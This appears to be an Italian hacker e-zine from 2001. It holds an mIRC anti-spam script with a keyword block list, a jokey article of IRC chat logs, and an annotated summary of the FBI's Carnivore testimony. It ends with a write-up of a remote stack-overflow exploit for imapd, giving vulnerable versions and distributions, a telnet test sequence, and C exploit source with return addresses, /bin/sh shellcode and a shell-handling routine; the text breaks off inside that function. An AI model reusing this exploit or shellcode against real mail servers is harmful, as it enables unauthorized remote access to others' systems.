n18=  set %spam-parole messaggio,sesso,cybersex,Dynamirc,Ðynamirc,DYNAMRC,ScRipT³,Dynamrc'99,Dynamirc'99,Ðynamrc,°MËñòkª,NýTrÖ,menok,G|G4Byt3,§©rÎpT,ScRiPt,!Dynamirc!,porno,guadagnare,http://hello.to/dynamirc,4(512Ðynamirc54),http://dynamirc.cjb.net,http://dynamirc.tsx.org,4(512Ðynamirc'9954)
n19=  set %status-antispam AntiSpam Spento
n20=  set %spam-ignore 1
n21=  set %spam-tempoignore 30
n22=  set %spam-ignoremask 3
n23=  set %spam.bloccati 0
n24=}
n25=dialog spam {
n26=  title "spam Setup"
n27=  size 50 100 445 230
n28=  button "fine", 1, 321 120 100 40, ok
n29=  edit "", 2, 220 80 200 18,center,autohs,autovs
n30=  EDIT "", 3, 220 100 200 18,center,autohs,autovs
n31=  edit "", 9, 1 22 210 20, left,autohs,autovs
n32=  list 10, 1 45 210 120, extsel size
n33=  button "Add", 11, 2 1 60 20, default
n34=  button "Deleta", 12, 65 1 50 20, default
n35=  check "Ignore?", 13, 240 1 86 20, right
n36=  text "Per quanti Secondi?", 14, 240 22 121 20, left
n37=  edit "", 15, 360 19 40 20, right,autohs,autovs
n38=  text "Hostmask", 16, 240 48 158 20, left
n39=  combo 17, 300 45 120 120, drop
n40=  button "AttivaI", 18, 220 120 100 20, default
n41=  button "Spegni",19 , 220 140 100 20, default
n42=  icon 33, 10 150 400 100, sp.bmp
n43=}
n44=
n45=on *:DIALOG:spam:init:0: {
n46=  did -a spam 3 Spam Bloccati: %spam.bloccati
n47=  did -a spam 2 %status-antispam
n48=  if (%spam-parole) { spam-parole }
n49=  did -a spam 17 *!user@host.domain
n50=  did -a spam 17 *!*user@host.domain
n51=  did -a spam 17 *!*@host.domain
n52=  did -a spam 17 *!*user@*.domain
n53=  did -a spam 17 *!*@*.domain
n54=  did -a spam 17 nick!user@host.domain
n55=  did -a spam 17 nick!*user@host.domain
n56=  did -a spam 17 nick!*@host.domain
n57=  did -a spam 17 nick!*user@*.domain
n58=  did -a spam 17 nick!*@*.domain
n59=  if (%spam-tempoignore) {
n60=    did -a spam 15 %spam-tempoignore
n61=  }  
n62=  else { 
n63=    did -a spam 15 30 
n64=  }
n65=  if (%spam-ignoremask) { 
n66=    did -c spam 17 %spam-ignoremask 
n67=  } 
n68=  else { 
n69=    did -c spam 17 1 
n70=  }
n71=  if (%spam-ignore == $null) || (%spam-ignore == 0) {
n72=    did -b spam 14 
n73=    did -b spam 15 
n74=    did -b spam 16 
n75=    did -b spam 17
n76=  } 
n77=  else { 
n78=    did -c spam 13 
n79=  }
n80=}
n81=on *:DIALOG:spam:sclick:1:sbiliguda
n82=on *:DIALOG:spam:sclick:11:aggiungi.parola
n83=on *:DIALOG:spam:sclick:12:deleta.parola
n84=on *:DIALOG:spam:sclick:13:diddalo
n85=on *:DIALOG:spam:sclick:18:accendi
n86=on *:DIALOG:spam:sclick:19:spegni
n87=;============> Gruppi
n88=#spam on
n89=on !1:text:*:?: {
n90=  %spam-ricerca-loop = 0
n91=  :loop
n92=  inc %spam-ricerca-loop 
n93=  %spam-ricerca-ok = $gettok(%spam-parole,%spam-ricerca-loop,44) 
n94=  %spam-ricerca-stringa = $remove($strip($1-),$chr(44))
n95=  if (%spam-ricerca-ok) {
n96=    if ($findtok(%spam-ricerca-stringa,%spam-ricerca-ok,0,*) > 0) || ($findtok(%spam-ricerca-stringa,%spam-ricerca-ok,0,32) > 0) { 
n97=      if (%spam-ignore == 1) { 
n98=        close -m $nick 
n99=        ignore -u [ $+ [ %spam-tempoignore ] ] $nick %spam-ignoremask 
n100=        inc %spam.bloccati
n101=        msg $nick $versione.antipspam La Parola " $+ %spam-ricerca-ok $+ " e' nel mio Blocca-spam
n102=        echo -a $bloccato  " $+ %spam-ricerca-ok $+ " 
n103=      } 
n104=      else { 
n105=        inc %spam.bloccati
n106=        msg $nick $versione.antipspam La Parola " $+ %spam-ricerca-ok $+ "  e' nel mio Blocca-spam
n107=        echo -a $bloccato  " $+ %spam-ricerca-ok $+ "  
n108=      }
n109=    }
n110=    else { goto loop }
n111=  }
n112=  unset %spam-ricerca-*
n113=}
n114=on !1:notice:*:?: {
n115=  %spam-ricerca-loop = 0
n116=  :loop
n117=  inc %spam-ricerca-loop 
n118=  %spam-ricerca-ok = $gettok(%spam-parole,%spam-ricerca-loop,44) 
n119=  %spam-ricerca-stringa = $remove($strip($1-),$chr(44))
n120=  if (%spam-ricerca-ok) {
n121=    if ($findtok(%spam-ricerca-stringa,%spam-ricerca-ok,0,*) > 0) || ($findtok(%spam-ricerca-stringa,%spam-ricerca-ok,0,32) > 0) { 
n122=      if (%spam-ignore == 1) { 
n123=        close -m $nick 
n124=        ignore -u [ $+ [ %spam-tempoignore ] ] $nick %spam-ignoremask 
n125=        inc %spam.bloccati
n126=        msg $nick $versione.antipspam La Parola " $+ %spam-ricerca-ok $+ " e' nel mio Blocca-spam
n127=        echo -s $bloccato  " $+ %spam-ricerca-ok $+ " 
n128=        $cancella
n129=      } 
n130=      else { 
n131=        inc %spam.bloccati
n132=        msg $nick $versione.antipspam La Parola " $+ %spam-ricerca-ok $+ "  e' nel mio Blocca-spam
n133=        echo -s $bloccato  " $+ %spam-ricerca-ok $+ "  
n134=        $cancella
n135=      }
n136=    }
n137=    else { goto loop }
n138=  }
n139=  unset %spam-ricerca-*
n140=}
n141=#spam end
n142=;============> Aliases
n143=alias aggiungi.parola  {
n144=  if ($did(spam,9).text) && ($findtok(%spam-parole,$did(spam,9).text,0,44) < 1) && ($chr(44) !isin $did(spam,9).text) { 
n145=    %spam-parole = $addtok(%spam-parole,$did(spam,9).text,44) 
n146=    did -a spam 10 $did(spam,9).text 
n147=    did -r spam 9
n148=  }
n149=}
n150=alias deleta.parola  {
n151=  if ($did(spam,10).sel) {
n152=    :loop 
n153=    %spam-parole = $remtok(%spam-parole,$did(spam,10,$did(spam,10).sel).text,44) 
n154=    did -d spam 10 $did(spam,10).sel 
n155=    if ($did(spam,10,0).sel > 0) { 
n156=      goto loop
n157=    } 
n158=  }
n159=}
n160=alias spegni  {
n161=  set %status-antispam AntiSpam Spento 
n162=  did -r spam 2 
n163=  did -a spam 2  %status-antispam 
n164=  ./.disable #spam 
n165=  echo  -a $spentoz
n166=}
n167=alias accendi {
n168=  set %status-antispam AntiSpam Attivo 
n169=  did -r spam 2 
n170=  did -a spam 2 %status-antispam 
n171=  ./.enable #spam 
n172=  echo  -a $attivoz
n173=}
n174=alias diddalo  {
n175=  if ($did(spam,13).state == 1) { 
n176=    did -e spam 14 
n177=    did -e spam 15 
n178=    did -e spam 16 
n179=    did -e spam 17 
n180=  } 
n181=  else { 
n182=    did -b spam 14 
n183=    did -b spam 15 
n184=    did -b spam 16 
n185=    did -b spam 17 
n186=  }
n187=}
n188=alias sbiliguda {
n189=  %spam-ignore = $did(spam,13).state 
n190=  %spam-tempoignore = $did(spam,15).text 
n191=  %spam-ignoremask = $did(spam,17).sel
n192=}
n193=alias -l spam-parole {
n194=  %spam-parole-caricate = 0
n195=  :loop
n196=  inc %spam-parole-caricate
n197=  if ($gettok(%spam-parole,%spam-parole-caricate,44)) { 
n198=    did -a spam 10 $gettok(%spam-parole,%spam-parole-caricate,44) 
n199=    goto loop 
n200=  }
n201=  unset %spam-parole-caricate
n202=}
n203=alias cancella { clear -s }
n204=alias bloccato { return 4<<< 7Spam bloccato4 >>> }
n205=alias attivoz { return 4<<< 7AntiSpam Attivo4 >>> }
n206=alias spentoz { return 4<<< 7AntiSpam Spento4 >>> }
n207=alias versione.antipspam { return 4<<< 7AntiSpam http:\\www.hackersat.com 4 >>> }
n208=;============> Menu
n209=menu menubar,status  {
n210=  [=== AnTI-SpaM ===]:/dialog -m spam spam
n211=}

_____________________________________________________________________________________


MA TORNIAMO A NOI.

Ci sarebbe un'altro metodo cioè quello di mettere come proprio nickname ad 
esempio "sono_m", ci ho provato una volta (ero proprio esausto per farlo) e 
devo dire che ha funzionato proprio bene!Solo che l'inconveniente è proprio il 
nick :non vi sembra orrendo ??

cmq adesso vi continuo a riportare queste caxxatelle di log :)

adesso ci provo io.Ho visto il nick Pandoram e allora mi ricordai una vecchia 
filastrocca!!

Session Start: Tue Mar 27 20:15:40 2001
20:15:42 <ssYYnn> ciao
20:16:13 <ssYYnn> pandora ti porterò al palazzo,ti mostrerò il mio ca..ro e amato genitor...
20:16:15 <ssYYnn> hihih
20:16:18 <ssYYnn> ci 6 ?
Session Close: Tue Mar 27 20:25:21 2001

Comunque la filastrocca continuava così se non vado errato : pandora ti porterò in 
bottega, tu mi farai una se..mplice dichiarazione d'amor. Pandora andremo 
nella **iga (diga?), mi mostrerai la fi..ne di questo grande amor.

andiamo avanti .

Session Start: Mon Mar 26 21:42:01 2001
21:42:01 <io75> ciao m o f
21:42:07 <ssYYnn> m
Session Close: Mon Mar 26 21:42:08 2001

Uno dei discorsi + lungo di tutto il secolo! Questi sono ragazzi che non vogliono 
nemmeno sprecare un po' di tempo,xchè o sono alla caccia disperata o sono dei 
tirati di primo ordine!

adesso alle prese con un mongoloide!

Session Start: Sat Mar 24 20:01:13 2001
20:01:13 <matteo29^> ciao principessa!come stai?
Session Close: Sat Mar 24 20:01:18 2001

Non stai bene ?? Una principessa di nome sYn non laho mai vista, ma...no comment!

avanti.

Session Start: Sat Mar 24 20:06:11 2001
20:06:11 <shevchenk> ciao
20:06:19 <ssYYnn> ciao
20:06:20 <ssYYnn> sono m
Session Close: Sat Mar 24 20:06:24 2001

lungo anche questo.

avanti.

Session Start: Mon Mar 26 21:33:38 2001
21:33:38 <vivagiorgio> CIAO
21:33:44 <ssYYnn> ciao
21:33:45 <ssYYnn> sono m
21:33:55 <vivagiorgio> OK
21:33:59 <vivagiorgio> GRAZIE
21:34:01 <vivagiorgio> CIAO
Session Close: Mon Mar 26 21:34:03 2001

NON CI POSSO CREDERE? Era un grazie quello? Impossibile sono stato alle prese con un 
ragazzo che usa l'educazione in chat! Questo è da prendere come esempio e modello.
MA (xchè c'è sempre un MA nella vita...) questo è un caso.

Ragazzi mi sono un po' annoiato ,per non dire un'altra parola. Devo pensare a fare 
altre cose quindi adesso vi lascio.Spero che questo articolo vi sia piaciuto e vi 
abbia fatto conoscere come è "fatta" la chat su IRC e il contrasto tra i sessi opposti.
Dovete capire bene come ci si deve comportare alle prese di "affamati" ragazzi; 
alcuni logs io non li ho messi ma molti mi auguravano anche buona caccia! HIHIHIHIH.

(Che bello manca la mia prof di italiano per tutta la settimana, ieri sono stato in 
gita, e ho pariato tantooo.Abbiamo conosciuto cinesi e spagnole, con quest'ultime 
abbiamo parlato a fondo con i nostri commenti in dialetto napoletano che si potevano 
nascondere!!Nel pullman abbiamo fatti i giochi + bambineschi di questo pianeta, e 
dopo mi so' messo ad ascoltare un po' i Placebo ; Cavolo mi avete rotto le cuffie!!!)
Ho fatto questa parentesi xchè mi hanno riferito che potevo scrivere di tutto ..hihih; 
fate finta cmq che io non abbia detto niente.

IMMACOLATA TI AMO
GIADA TI AMO
SARA TI AMO
      !!!

Vi voglio bene a tutti! (sopratutto a Smav!)

Volevo salutare in particolare Skam e Ghent dell'h@.


per qualunque cosa o incomprensione scrivetemi.




sYn

--=|www.hackersat.com|=----=|syn@hackersat.com|=--






/===========================::=============================::=================/
/  /Carnivore Diagnostic Tool /                              Screener_it      /
/===========================::=============================::=================/





Carnivore Diagnostic Tool

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Autore: Screener_it
email: screener_it@freemail.it
URL: http://go.to/tankcommandos
DATA: 22/03/01

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Le presenti informazioni sono facilmente recuperabili in Rete, anche sul sito dell'FBI.
Quindi su questo articolo non saranno dette cose sconosciute totalmente, ma verranno 
solo trattate argomentazioni sconosciute ai più.

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Siamo davvero soli ? Il 6 settembre 2000 questa domanda ha avuto una risposta. 
La risposta è NO.
Il 6 settembre 2000 il signor Donald M. Kerr presentava al senato degli Stati 
Uniti d'America (USA) il programma Carnivore.
Con questa data anche la più piccola speranza di anonimimato in Rete è sparita.
Tra virgolette ( " " ) saranno riportati passi del discorso pronunciato il 6 settembre.

E voi credevate che con Echelon finisse tutto..

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

"Buongiorno ,  Mr Chairman e membri del comitato. Vi sono grato per l'oppportunità di 
poter parlare di Carnivor - un sistema designato specificamente per forzare la privacy 
e allo stesso tempo rispettare la legge.
Carnivore è un sistema che contiamo possa venirci in aiuto nei casi critici di 
combattimento al terrorismo, allo spionaggio, alla guerra d'informazioni, all'hacking ed 
altri crimini violenti che usano Internet, per difendere la nostra Nazione e la nostra gente.
Nel mio discorso toccherò principalmente 5 punti:

1.- Perchè abbiamo bisogno di un sistema come Carnivore
2.- Perchè il publico deve essere a conoscenza del fatto che Carnivore esista
3.- Come lavora Carnivore
4.- Perchè gli ISP non devono avere timore dell'uso di Carnivore
5.- Perchè il pubblico deve essere fiducioso che l'uso di Carnivore non lederà la loro privacy"

Credo che abbiate capito che cosa sia a grandi linee Carnivore. Un programma che una 
volta installato dai provider su richiesta (richiesta o obbligo ?) del FBI è in grado 
d'intercettare qualsiasi comunicazione.

In questi anni l'FBI è andata incontro a un largo numero di criminali che usavano 
Internet per comunicare tra di loro o per comunicare con le loro vittime.
Spesso però i provider di appartenenza di questi criminali non hanno gli strumenti 
necessari per intervenire salvaguardando la privacy degli altri utenti.
In parole povere possono controllare le e-mail, ma devono controllarle tutte, non 
hanno gli strumenti necessari per bloccare quelle che vengono da un determinato utente 
o da un determinato abbonamento.
Proprio per venire incontro a questi provider il laboratorio dell'FBI ha creato Carnivore.
Carnivore, ascoltando la definizione che ha l'FBI, ha una capacità "chirurgica" di 
intercettare e loggare particolari comunicazioni che infrangono la legge, lasciando 
stare le altre, evitando così intercettazioni non autorizzate.

Carnivore lavora come molti degli "sniffer" in circolazione e altri tool usati dagli 
ISP tutti giorni con la differenza però che ha la straordinaria capacità di distinguere 
tra comunicazioni che possono essere legalmente intercettate e quelle che non possono esserlo.
Ad esempio può (opportunamente configurato) intercettare solo un tipo di 
comunicazione (e-mail ad esempio) ed escludere le altre (es. shopping online) oppure 
può essere configurato per controllare solo le email che provengono o che vengono 
indirizzate a un particolare indirizzo.

"1.- Perchè l'FBI ha bisogno di Carnivore ?

E' cosa risaputo che terroristi, spie, hacker [ma ci mettono sullo stesso piano ?] e 
altri pericolosi criminali usano sempre di più il computer e le reti, inclusa Internet, 
per portare a termine i loro piani criminali.
Carnivore è la nostra risposta , per salvaguardare la nostra Nazione, la popolazione 
americana [gli europei no, puzziamo troppo.. :)) ], la sicurezza delle nostre 
comunicazioni e la sicurezza dei privati e per una Internet più sana e sicura.
Per questo l'FBI concentra le sue forze, compresa la ricerca tecnologica, per 
combattere questi cyber criminali"

Faccio notare tutti la continua presenza della parola criminali associata a Internet..

"2.- Perchè il publico deve essere a conoscenza del fatto che Carnivore esista"

Vi risparmio tutto il discorso, in quanto infarcito di riferimenti a leggi varie. 
Il discorso più che altro è legato al fatto che  nonostante ci siano delle leggi in 
materia di Privacy anche in Internet, loro sono autorizzati a non rispettarle, 
se questo è utile alla protezione della sicurezza.
Il pubblico và informato del fatto che Carnivore esiste perchè così tutti sappiamo 
che possono farci il culo quando e come vogliono e che lo fanno in maniera completamente 
legale.. Bello, no ?

"3.- Come lavora Carnivore e perchè l'FBI crede che sia più attendibile, preciso e 
tecnologicamente superiore degli sniffer commerciali ?


Carnivore è veramente un tool studiato per le intercettazioni telematiche.
Il programma è un filtro che l'FBI ha sviluppato con cura, precisione e rispettando la legge.
In particolare, il programma permette all'FBI, con la compiacenza della costituzione 
federale, le intercettazione telematiche di tutte le comunicazioni permettendo agli 
investigatori di acquisire il maggior numero di informazioni possibili sul bersaglio.

Carnivore è superiore a qualsiasi "sniffer" esistente in commercio che gli ISP usano 
ogni giorno sul loro network.
La concezione di intercettazioni con gli altri sniffer è molto chiusa e con essi 
viene infranta ogni possibile legge sulla privacy.
Non sono stati creati per le intercettazioni.

E' importante descrivere quando e come Carnivore lavora. E' importante spiegare cosa 
il programma mostra e, più importante, cosa non mostra agli agenti dell'FBI che lo usano.

Prima di tutto, Carnivore verrà usato solo quando l'FBI avrà il permesso della 
corte (o quando la legge lo consente) ad intercettare o ad acquisire informazioni 
sul criminale, come ad esempio il suo indirizzo, il suo numero account ec..
Secondo, quando un ISP può collaborare completamente con la corte [mostrare i 
log insomma] l'FBI non avrà la necessità di impiegare Carnivore.
Terzo, l'uso del programma può essere fatto solo con la collaborazione dei tecnici 
dell'ISP e l'FBI non può usarlo senza la loro cooperazione.
Quarto, una volta messo al lavoro Carnivore potrà analizzare solo il piccolo segmento 
di traffico del network che verrà usato dall'obbiettivo e dove le sue comunicazioni 
possono passare.
Il programma non può avere accesso di tipo "Grande Fratello", cioè non può controllare 
tutto il traffico dell'ISP. [dobbiamo crederci ?].

Per illustrare le funzionalità di Carnivore è importante capire che Carnivore filtra solo 
le informazioni che gli servono.
La sua prima operazione è filtrare una porzione della traffico dell'ISP.
Lo filtra in codice binario, una serie di 0 e 1 che scorre attraverso la rete dell'ISP, 
per esempo, a 40 megabit al secondo, spesso a una velocità maggiore.
Carnivore lavora in tempo reale con queste velocità. Per visualizzare meglio il concetto, 
provate a pensare a un enorme schermo che contiene 40 milioni di 0 e 1 che appaiono sullo 
schermo per 1 secondo e 1 secondo solo.
La prima operazione di Carnivore sarà quella di identificare se e quali di quegli 0 e 1 
appartengono al criminale e a quale tipo di comunicazione appartengono (infatti se 
hanno il permesso di intercettare solo le email, non possono intercettare l'FTP).

Se trovato, il paccheto che contiene le informazione del soggetto in questione viene 
ulteriormente filtrato.
E' importante comunque ricordare che quei 40 milioni di 0 e 1 che non centrano nulla 
on il criminale in questione non vengono in alcun modo salvati, essi si vaporizzano 
dopo 1 secondo.
Puff, spariti, vaporizzati, non vengono collezionati, salvati o venduti.
Il personale dell'FBI non vedrà mai nessuno di questi 40 milioni di 0 e 1.
Se non ci sono informazioni del soggetto in questione in questo schermo si 
passerà allo schermo successivo che sarà trattato sempre con lo stesss sistema.

A questo le informazioni del soggetto sotto controllo passeranno ad un altro filtro, 
che controllerà di che siano queste informazioni e solo se appartengono al tipo di 
comunicazione di cui si ha l'autorizzazione di intercettazione. Solo ora, dopo che è 
stato filtrato tutto, gli addetti dell'FBI vedranno il risultato.

4.- Perchè gli ISP non devono avere timore dell'uso di Carnivore

Carnivore lavora solo su una piccola parte del server, ovvero la parte dove 
è possibile che passino i dati che riguardano il soggetto sotto osservazione (come 
già detto prima).
Carnivore è collegato al server attraverso un ponte fisico che gli impedisce di 
trasmettere dati di qualsiasi tipo al resto del network, quindi non ha potere di 
trasmettere dati o qualsiasi altra cosa al netowrk.

Ma Carnivore non è mai stato installato e non sarà mai installato senza 
l'autorizzazione del personale del personale del provider.
Internet è una rete molto complicata e in continua evoluzione e le assicuro che 
senza le conoscenze tecniche del personale dell'ISP sarebbe molto difficile, e 
in alcuni casi davvero impossibile, controllare il soggetto.
In più l'FBI non potrebbe lavorare senza le informazioni che danno i tecnici 
riguardo all'architettura e ai protocolli del server.

Qualcuno ha mossa la critica che Carnivore aumenterebbe le possibilità di essere 
vittime di hacking. Ma sbagliano.
Con rispetto per l'hacking e considerando le tecniche hacking più usate, non ci 
sono significativi aumenti di insicurezza nell'usare Carnivore.
In più dato che Carnivore è uno strumento dell'FBI usarlo come punto di accesso 
per altri network sarebbe da pazzi per il rischio che si corre [effettivamente 
farla in barba all'FBI sarebbe come consegnarsi in prigione..] e in più come 
detto precedentemente Carnivore non ha accesso al resto del network [può solo 
ricevere dati, non risponde]

In ultima c'è la faccenda che secondo un particolare ISP l'uso di Carnivore ha 
causato il crash del suo sistema e altri problemi nel network.
Ma queste dichiarazioni sono sbagliate. Prima di tutto la causa dei problemi del 
network (non ci fù crash) era semplicemente di natura tecnica e quindi di esclusiva 
competenza dei tecnici del network.
[bel modo di scaricare le colpe..]


5.- Perchè il pubblico deve essere fiducioso che l'uso di Carnivore non lederà la 
loro privacy

Crediamo che il popolo americano abbia fiducia nell'FBI per la sua condotta del 
controllo elettronico, principalmente perchè hanno capito che noi lavoriamo nel 
rispetto della legge, dopo che il congresso emanò la 40 anni fà la prima legge 
sulla sorveglianza elettronica nel 1968.
Molti dicono che i metodi dell'FBI sono illegali. E' sbagliato, non ci sono prove 
che lo dimostrino.
Ogni azione è autorizzata da un tribunale e l'FBI non ha mai abusato del suo potere.

Cominciamo col dire che tutte le investagazioni dell'FBI, ogni sorveglianza, ogni 
intercettazione, ogni perquisizione è autorizzata, monitorata e supervisionata per 
ogni passo dal locale studio legale e le corte legale o da un magistrato.

Ogni nostra azione è controllata e approvata da chi di competenza in quel campo e 
in quello stato.

Negli ultimi 30 anni le intercettazioni elettroniche dell'FBI sono state strettamente 
supervisionate dal dipartimento di giustizia e non ci sono mai stati absui. Anzi, il 
dipartimento di giustizia ha sempre indicato i nostri modelli come modelli di 
correttezza, cura e rispetto della legge nelle intercettazioni.

A questo punto può essere utile parlare del personale che utilizzerà Carnivore.

Cominciamo col dire che tutti gli impiegati dell'FBI sono persone che hanno dimostrato 
onestà, rispetto della legge, integrità personale.
Tutto questo può essere dimostrato con la loro condotta che ha portato all'attuale 
sicurezza nazionale e al livello investigativo.
Per essere sicuri la struttura dell'FBI fà crollare presto se gli agenti assunti si 
dimostrano non degni di fiducia o se non mantengono la riservatezza riguardo al loro 
impiego."

6 settembre 2000 - Donald M. Kerr

Questo è un sunto del discorso di Kerr, naturalmente non è una traduzione completa di 
ogni singolo passo, ma ho estratto le parti più importanti.
Spero comunque che questa lettura vi faccia capire che la possibilità di essere tracciati 
esiste sempre, non siete mai anonimi, posso sempre sapere chi siete.

Qualke link per sapere di più ?

www.fbi.gov --> Andate su Search e scrivete Carnivore.. Troverete molta roba
http://www.fbi.gov/congress/congress00/kerr090600.htm
http://www.fbi.gov/programs/carnivore/

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\

Un saluto a tutti quelli del Tank Commandos, a Bismark.it [che mentre chiudo è 
chiuso x problemi con pedofilia], a quelli di Dirty Net, a quelli di irc.azzurra.it, 
agli U.TN.

*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\








/===========================::=============================::=================/
/  /Imapd exploit /                                          SPYRO            /
/===========================::=============================::=================/


 -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-


 / -
    |--> /Disclaimer
    |--> /Info_su_Imapd_&_Exploit
    |--> /Versioni_vulnerabili
    |--> /Distribuzione_di_Linux_con_Demone_vulnerabile
    |--> /Testare_le_condizioni_x_attuare_exploit
    |--> /Impatto_dopo_funzionamento_exploit
    |--> /Correzione_exploit
    |--> /Codice_sorgente_exploit
    |--> /Ringraziamenti_e_Saluti


  -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-


bash# cd /Disclaimer
bash# cat disclaimer.txt


Quello che riporterò qui di seguito,sarà la spiegazione di un'exploit che ha lo scopo di far 
ottenere l'accesso ad un server tramite esso.
Al giorno d'oggi la rete pultroppo è piena di lamer,e io con questo testo non vorrei contribuire 
alla nascita di nuovi,qundi pensateci due volte prima di mettere in atto queste informazioni. 
Io ho scritto questo testo soltanto x mettere in evidenza i problemi di sicurezza riguardanti la 
rete.
Quindi se farete danni a voi stessi o ad altre persone,NE IO,NE L'AUTORE DEL BUG,ci rendiamo 
responsabili!
Tutto a scopo informativo!
Siete RESPONSABILI delle vostre azioni.
                                   


  -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-


bash# cd /Info_su_Imapd_&_Exploit
bash# cat info.txt


Imapad è il più popolare e famoso demone per mail service usato dagli ISP's di tutto il mondo.
Sviluppato dalla Washington´s University,imapad è un programma usato con molti servizi di Webmail.
Quindi è possibile usufruire del demone da remoto,precisamente sulla porta 143.
Recentemente è stato trovato un'exploit da remoto basat su un metodi di Stack overflow,ovvero
un'eccedenza di dati.
Il programma riceve segnali SIGSEGV,e lo mandano in Segmentation fault,ovvero si impianta =)
0x41414141 in ?? ()
(gdb)

Questo Bug è stato scoperto da uno specialista in sicurezza di nome Felipe Cerqueira, 
(fcerqueira@bufferoverflow.org),che ha scritto un remote exploit in C per questo demone. 


  -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-


bash# cd /Versioni_vulnerabili
bash# cat vers.txt


Non tutte le versioni di Imapad sono vulnerabili,e qui di seguito elencherò quelle che lo sono:

-- IMAP4rev1 v12.261
-- IMAP4rev1 v12.264
-- IMAP4rev1 2000.284

Nota: L'exploit è stato testato solo sulle versioni di Imapad che ho elencato sopra,ciò non 
toglie il fatto che anche altre versioni siano buggate da questo remote exploit.


  -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-


bash# cd /Distribuzione_di_Linux_con_Demone_vulnerabile
bash# cat distro.txt


Riporto un piccolo schema per capire quale  distribuzione di linux,ha il demone buggato.

                        ______________________________________________
                       |         Distro.         |    Vulnerabile?    |
                       |-------------------------|--------------------|
                       |Slackware 7.0            |         SI         |
                       |                         |                    |
                       |Suse Linux               |          ?         |
                       |                         |                    |
                       |Corel Linux              |          ?         |
                       |                         |                    |
                       |Conectiva Linux 6.0      |         SI         |
                       |                         |                    |
                       |Mandrake Linux           |         NO         |
                       |                         |                    |
                       |RedHat 6.2 Zoot          |         SI         |
                       |                         |                    |
                       |Debian Linux             |          ?         |
                       |                         |                    |
                       |Slackware 7.0            |         SI         | 
                        ----------------------------------------------


  -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-


bash# cd /Testare_le_condizioni_x_attuare_exploit
bash# cat test.txt


Per mettere in atto questo exploit,prima dobbiamo fare delle prove alla linux box.
Per farlo,basta seguire questo tipo di comandi:


telnet> open 266.299.992.662 143

* OK localhost IMAP4rev1 v12.261 server ready
1 login felipe felipe
1 OK LOGIN completed
1 lsub "" {1064}
+ Ready for argument
A*1064


  -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-


bash# cd /Impatto_dopo_funzionamento_exploit
bash# cat impatto.txt


Se l'exploit va a buon fine,ovvero funziona,cosa accade e cosa ci compare?

Avverrà che avremo un'accesso da remoto senza permessi di root,ma con UID e GID di un'user auten
ticato nell'imap server.
Quindi per roottare la shell,andrebbe usato un'exploit da locale(da non fare). ;)  


  -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-


bash# cd /Correzione_exploit
bash# cat correxp.txt


Per correre ai ripari da questo exploit,non bisogna far altro che collegarsi su:

ftp://ftp.cac.washington.edu/imap

e scaricarsi la nuova versione di IMAP(IMAP200c - 2000.287) dove è stato corretto il problema. 


  -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-
 

bash# cd /Codice_sorgente_exploit
bash# cat imapd.c

-------------------------------------------Exploit-----------------------------------------------


/* 
 *			!!! Private !!!
 *
 *  imapd IMAP4rev1 v12.261, v12.264 and 2000.284 Remote Exploit. Others? Yes!
 *
 *  By: SkyLaZarT ( fcerqueira@bufferoverflow.org ) .aka. Felipe Cerqueira
 *  Homepage: www.BufferOverflow.Org
 *  Thankz: cync, oldm and Jans. ( BufferOverflow.org Team )
 *		Antonio Marcelo and Felipe Saraiva
 *
 */


#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>

#define SIZE		1064
#define NOP		0x90
#define RET12261	0xbffff3ec
#define RET12264	0xbffff4e0
#define RET12264ZOOT	0xbffff697
#define RET2000_284	0xbfffebc8

#define INIT(x)	bzero(x, sizeof(x))
#define READ(sock,x) read(sock, x, sizeof(x)) 


#define TIMEOUT		20

char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int debug = 0;


void openshell(int sock, int check);
void processSignal(int signum);

void processSignal(int signum) {
	fprintf(stderr, "Time out!!\n");
	exit(-1);
}


void openshell(int sock, int check) {
	char buffer[1024];
	fd_set rset;
	int i;
	
	while(1) {
		FD_ZERO(&rset);
		FD_SET(sock, &rset);
		FD_SET(fileno(stdin), &rset);

		select(sock + 1, &rset, NULL, NULL, NULL);

		if (FD_ISSET(sock, &rset)) {
			if ((i = read(sock, buffer, sizeof(buffer))) <= 0) {
